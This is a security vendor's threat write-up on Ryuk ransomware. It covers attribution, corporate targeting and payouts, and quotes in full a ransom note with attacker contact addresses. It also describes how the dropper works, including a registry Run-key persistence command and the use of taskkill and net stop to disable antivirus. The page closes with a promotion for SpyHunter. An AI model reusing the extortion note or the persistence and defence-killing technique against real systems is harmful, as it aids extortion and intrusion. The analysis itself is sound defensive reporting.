Ryuk Ransomware

Posted: August 23, 2018

Ryuk Ransomware Description

The Ryuk Ransomware is a file-locker, which seems to use the codebase of the Hermes Ransomware, but its authors have copied the style of the ransom message seen during the BitPaymer Ransomware attacks. However, we are yet to learn whether the cybercrooks behind the Ryuk Ransomware project have anything to do with the other two file-lockers, or if we are talking about an entirely new operation. The current number of users infected by the Ryuk Ransomware seems rather low, but the majority of them seem to be companies so that it is very likely that the Ryuk Ransomware might not target random users and, instead, its authors use sophisticated propagation techniques to go after companies capable of paying the hefty ransom fee.

Ryuk's Operators Focus on Attacking Company Servers

It is possible that the Ryuk Ransomware's authors utilize either fraudulent e-mail messages or remote desktop software attacks to infect the computers. Regardless of the infection vector used, the consequences are always the same – a large number of encrypted files whose recovery is only possible with the use of specialized software and the decryption key stored on the server of the attacker. The only new thing that the Ryuk Ransomware's attack leaves behind is a file called 'RyukReadMe.txt,' which contains a ransom message. Surprisingly, the attackers have utilized several ransom note styles and e-mail addresses – this might be an effort to pretend that there is more than one group behind these attacks. The e-mail address associated with the Ryuk Ransomware's authors are:

'MelisaPeterman@protonmail.com', 'MelisaPeterman@tutanota.com', 'eliasmarco@tutanota.com', 'CamdenScott@protonmail.com', 'AndyMitton@protonmail.com', and 'AndyMitton@protonmail.com'

Ultimately, Ryuk ransomware is a high-threat malware that has been used in multiple targeted attacks across the globe, primarily attributed to a single outfit known as Grim Spider. Ryuk was first used back in 2018 and even though reporters initially thought it was run by a North Korean outfit of hackers working for the state, multiple security researchers published reports that linked Ryuk to Russian bad actors.

Ryuk is not your garden variety ransomware that is just distributed en-masse using spam emails. It is a much more targeted threat, developed and precision-tooled to infect large businesses and corporations, where ransom demands are astronomical and the damages that those business would suffer if they half operations are just as immense. According to a report by Check Point researchers, even as early as late 2018, the threat actors behind Ryuk had bagged a hefty $640,000 in ransom payment, with individual ransoms ranging between 15 and 50 Bitcoin. The Ryuk ransomware hit major US publishing company Tribune Publishing in late 2018 and was used in attacks against other US governmental institutions in 2019, including a strike against the Boston Committee for Public Counsel Services.

Ryuk is different from most other forms of ransomware in the fact that it encrypts files in a much more focused manner, targeting only critical parts of the data and running on manual control from the bad actors. In order to be able to manually control the ransomware, the bad actors need to have done thorough mapping of the targeted network and to have secured an extensive amount of login credentials, which is a sign of extensive preparation.

The ransom note Ryuk uses seems to be one of two variants. The first one is more verbose and somewhat more polite and was actually used in the single attack that netted the crooks behind the ransomware their biggest single payment to date - a massive 50 Bitcoin or over $300 thousand. The second one is shorter and showed up in attacks that also led to ransom payments of over $200 thousand each.

Researchers with Check Point discovered certain similarities between Ryuk and the older HERMES ransomware that was first used in late 2017. There are certain similarities in how the two malwares encrypt files, to the point where Ryuk uses identical code for placing and verifying encryption markers in its victim's files.

Here is the full text of one of the ransom notes:


Your business is at serious risk.
There is significant hole in the security system of your company.
We've easily penetrated your network.
You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks.
They can damage all your important data just for fun.

Now your files are crypted with the strongest military algorithms RSA4096 and AES-256.
No one can help you to restore your files irreversibly.

If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files
(Less than 5 Mb each, non-archived and your files should not contain valuable information
(Databases, backups, large excel sheets, etc.)).
You will receive decrypted samples and our conditions how to get the decoder.
Please don't forget to write the name of your company in the subject of your e-mail.

You have to pay for decryption in Biscuits.
The final price depends on how fast you write to us.
Every day of delay will cost you additional +0.5 BIT
Nothing personal just business

As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future
+ we will recommend you special software that makes the most problems to hackers.

Attention! One more time !

Do not rename encrypted files.
Do not try to decrypt your data using third party software.

P.S. Remember, we are not scammers. we don't need your files and your information.
But after 2 we all your files and keys will be deleted automatically. Just send a request immediately after infection.
All data will be restored absolutely.
Your warranty - decrypted samples. contact emails eliasmarco  at tutanota.com
CamdenScott at protonmall.com

BTC wallet: [alphanumeric string]

No system is safe

Check Point offers extensive technical analysis of Ryuk that reveals a lot about the ransomware.

Starting with the dropper that delivers Ryuk, it comes packed with both 32 and 64-bit varieties of the payload in the binary file. Upon execution, the dropped uses random generation to produce a filename. Once the filenames are ready, the appropriate file is dropped in the \users\Public\ directory on modern Windows versions. Before closing down, the dropper executes the deployed payload.

When it executes, Ryuk uses "taskkill" and "net stop" commands to shut down over 200 processes and services, using a pre-made list. The terminated entries are, as expected, primarily antivirus, antimalware and backup programs. Once this is done, Ryuk secures its persistence on system reboot, placing itself in the Run registry key with the following:

"reg add /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d"

For encryption, Ryuk uses three tiers of keys - a global RSA key pair that is only available to the bad actors, an RSA key pair that is unique for each victim and finally, an AES symmetric encryption key that is also unique for each victim. Encrypted files usually receive the ".ryk" extension.

The encryption process leaves out any directories related to browsers, as the victim will need a working browser to view the ransom note and buy Bitcoin. One curious detail that points to a connection between Ryuk and Hermes is that the directory whitelist also includes "AhnLab" - a South Korean IT security provider. Ryuk is not targeting South Korean demographics so this inclusion is strange and hard to explain and might point towards Ryuk being a reconstruction of older Hermes code.

Ryuk remains notable first and foremost for its massive victim payouts. Compared to other popular strains of ransomware such as Dharma or GrandCrab, Ryuk bought far greater profit to its authors. This is largely due to the fact that it was used in attacks against larger businesses that would suffer greater losses from production disruption and downtime and ended up paying the large ransom amounts.

Use SpyHunter to Detect and Remove PC Threats

If you are concerned that malware or PC threats similar to Ryuk Ransomware may have infected your computer, we recommend you start an in-depth system scan with SpyHunter. SpyHunter is an advanced malware protection and remediation application that offers subscribers a comprehensive method for protecting PCs from malware, in addition to providing one-on-one technical support service.

Download SpyHunter's Malware Scanner

Note: SpyHunter's free version is only for malware detection. If SpyHunter detects malware on your PC, you will need to purchase SpyHunter's malware tool to remove the malware threats. Learn more on SpyHunter. If you would like to uninstall SpyHunter for any reason, please follow these uninstall instructions. To learn more about our policies and practices, visit our EULA, Privacy Policy and Threat Assessment Criteria.

Why can't I open any program including SpyHunter? You may have a malware file running in memory that kills any programs that you try to launch on your PC. Tip: Download SpyHunter from a clean computer, copy it to a USB thumb drive, DVD or CD, then install it on the infected PC and run SpyHunter's malware scanner.

Home Malware Programs Ransomware Ryuk Ransomware

Leave a Reply

Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter. If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.